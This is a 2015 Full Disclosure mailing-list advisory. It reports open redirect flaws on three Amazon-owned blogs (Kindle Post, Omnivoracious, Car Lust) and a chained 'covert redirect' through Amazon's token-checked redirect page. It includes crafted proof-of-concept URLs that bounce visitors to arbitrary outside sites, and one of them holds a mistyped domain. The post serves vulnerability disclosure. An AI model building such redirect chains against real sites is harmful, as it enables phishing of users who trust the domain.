[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFWG0-grgXU-+OA3HOCNd3WJpdgbcfu_tJ6nFYuf-PF7dZpY9Q@mail.gmail.com>
Date: Sun, 11 Jan 2015 14:42:57 +0800
From: Jing Wang <justqdjing@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Amazon Covert Redirect Based on Kindle Daily Post,
Omnivoracious,
Car Lust & kindlepost.com omnivoracious.com carlustblog.com Open Redirect
*Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust
& kindlepost.com <http://kindlepost.com> omnivoracious.com
<http://omnivoracious.com> carlustblog.com <http://carlustblog.com> Open
Redirect *
*Discover:*
Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang
Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
*Domains:*
http://www.amazon.com
All kindlepost.com omnivoracious.com carlustblog.com are websites belonging
to Amazon.
http://www.kindlepost.com
"The Kindle Post keeps Kindle customers up-to-date on the latest Kindle
news and information and passes along fun reading recommendations, author
interviews, and more."
http://www.omnivoracious.com
"Omnivoracious is a blog run by the books editors at Amazon.com. We aim to
share our passion for the written word through news, reviews, interviews,
and more. This is our space to talk books and publishing frankly and we
welcome participation through comments. Please visit often or add us to
your favorite RSS reader to keep up on the latest information."
http://www.carlustblog.com
"Car Lust is, very simply, where interesting cars meet irrational emotion.
It's a deeply personal exploration of the hidden gems of the automotive
world; a twisted look into a car nut's mind; and a quirky look at the
broader automotive universe - a broader universe that lies beneath the new,
the flashy, and the trendy represented in the car magazines."
*Vulnerabilities Description:*
Amazon has a security problem. Both Amazon itself and its websites are
vulnerable to different kind of attacks.
When a user is redirected from amazon to another site, amazon will check a
variable named "token". Every redirected website will be given one token.
This idea is OK. However, all URLs related to the redirected website use
the same token. This means if the authenticated site itself has Open
Redirect vulnerabilities. Then victims can be redirected to any site from
Amazon.
The vulnerabilities can be attacked without user login. Tests were
performed on Safari 6.1.6 in Mac OS X 10.7.5, IE 8 in Windows 7, Chromium
(version 37.0.2062.120) in Ubuntu 12.04 (281580) (64-bit).
Use a website for the following tests. The website is "
http://www.diebiyi.com/articles". Suppose this website is malicious,
*(1) Kindle Daily Post Open Redirect & Amazon Covert Redirect Based on
kindlepost.com <http://kindlepost.com>*
*(1.1) Kindle Daily Post Open Redirect Security Vulnerability*
*Vulnerable Links:*
http://www.kindlepost.com/.services/sitelogout?to=https%3A%2F%2Fwww.typekey.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com%252F2013%252F03%252Fqa-with-rainbow-rowell-author-of-eleanor-park.html
*Poc:*
http://www.kindlepost.com/.services/sitelogout?to=http%3A%2F%2Fwww.diebiyi.com%3F%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com
*(1.2) Amazon Covert Redirect Based on kindlepost.com
<http://kindlepost.com>*
*Vulnerable URL of Amazon:*
http://www.amazon.com/gp/redirect.html?location=http://www.kindlepost.com/2014/02/index.html&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D
*POC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.kindlepost.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.diebiyi.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.kindlepost.com&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D
*(2) Omnivoracious Open Redirect & Amazon Covert Redirect Based on
omnivoracious.com <http://omnivoracious.com>*
*(2.1) Omnivoracious Open Redirect Security Vulnerability*
*Vulnerable Links:*
http://www.omnivoracious.com/.services/sitelogout?to=https%3A%2F%2Fwww.bing.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com%252F2008%252F05%252Flicensed-to-thr.html
*POC:*
http://www.omnivoracious.com/.services/sitelogout?to=http%3A%2F%2Fwww.tetraph.com%3F%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com
*(2.2) Amazon Covert Redirect Based on omnivoracious.com
<http://omnivoracious.com>*
*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?location=http://www.omnivoracious.com/2014/01/women-in-wartime-four-new-historical-novels.html&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087
*POC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.omnivoracious.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.xinhuanet.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087
*(3) Car Lust Open Redirect & Amazon Covert Redirect Based on
carlustblog.com <http://carlustblog.com>*
*(3.1) Car Lust Open Redirect Security Vulnerability*
*Vulnerable Links:*
http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.xvideos.com%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com
*POC:*
http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.kickass.so%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com
*(3.2) Amazon Covert Redirect Based on carlustblog.com
<http://carlustblog.com>*
*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?location=http://www.carlustblog.com/2014/01/gmc-canyon-isuzu-i-series-and-chevrolet-colorado-gmt355-platform.html&token=E0915379AEBDF40D2C90D4882003C7011F43D80
*POC:*
http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.varlustblog.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.inzeed.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=E0915379AEBDF40D2C90D4882003C7011F43D80
The vulnerabilities were reported to Amazon in 2014. Amazon has patch the
vulnerabilities.
*POC Video:*
https://www.youtube.com/watch?v=UE_-AdA-zpQ&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-based-on-kindle.html
--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists